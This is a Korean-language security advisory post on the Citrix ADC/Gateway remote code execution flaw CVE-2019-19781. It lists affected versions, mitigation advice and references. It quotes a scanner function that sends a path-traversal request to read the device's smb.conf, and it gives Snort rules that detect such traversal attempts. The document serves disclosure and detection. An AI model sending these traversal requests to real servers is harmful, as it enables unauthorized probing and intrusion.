[CVE 취약점] Citrix ADC/Gateway 제품 원격코드 실행 취약점(CVE-2019-19781)

[CVE 취약점] Citrix ADC/Gateway 제품 원격코드 실행 취약점(CVE-2019-19781)

참조

> https://github.com/trustedsec/cve-2019-19781/blob/master/cve-2019-19781_scanner.py

> https://www.bleepingcomputer.com/news/security/citrix-adc-cve-2019-19781-exploits-released-fix-now/

> https://support.citrix.com/article/CTX267679

> https://support.citrix.com/article/CTX267027

Poc 

def check_server(target, targetport, verbose):      try:          print("Scanning for CVE-2019-19781 on: %s        " % target, end="\r") # Cleaning up output a little          # if for some ungodly reason they are using HTTP          if targetport == "80":              url = ("http://%s:%s/vpn/js/../../%vpns/cfg/smb.conf" % (target,targetport))              req = submit_url(url)          # for all other requests use HTTPS          else:              url = ("https://%s:%s/vpn/js/../../vpns/cfg/smb.conf" % (target,targetport))              req = submit_url(url)          # if the system is still vulnerable          if ("[global]") and ("encrypt passwords") and("name resolve order") in str(req.content): # each smb.conf will contain a [global] variable              print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))              vulnServers.append(target)              return 1

개요

Citrix 社 제품에서 발생하는 취약점 주의 권고

공격자는 취약점을 악용하여 피해를 발생시킬 수 있으므로, 해당 Citrix 제품을 사용하는 이용자들은 해결 방안을 참고하여 조치 권고

Citrix의 ADC와 Gateway에서 공격자가 인증을 우회하여 임의코드를 실행할 수 있는 취약점(CVE-2019-19781)

영향 받는 제품 버전

- Citrix NetScaler ADC/NetScaler Gateway 10.5 버전

- Citrix ADC/NetScaler Gateway 11.1 버전

- Citrix ADC/NetScaler Gateway 12.0 버전

- Citrix ADC/NetScaler Gateway 12.1 버전

- Citrix ADC/Gateway version 13.0 버전

Critical(9.8)

방안

Citrix 홈페이지의 Solution 부분을 참고하여 임시 조치 수행

   ※ 해당 취약점이 해결된 패치 파일 공개 예정

Snort  

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt";  flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"/../";  http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt";  flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"%2E%2E"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)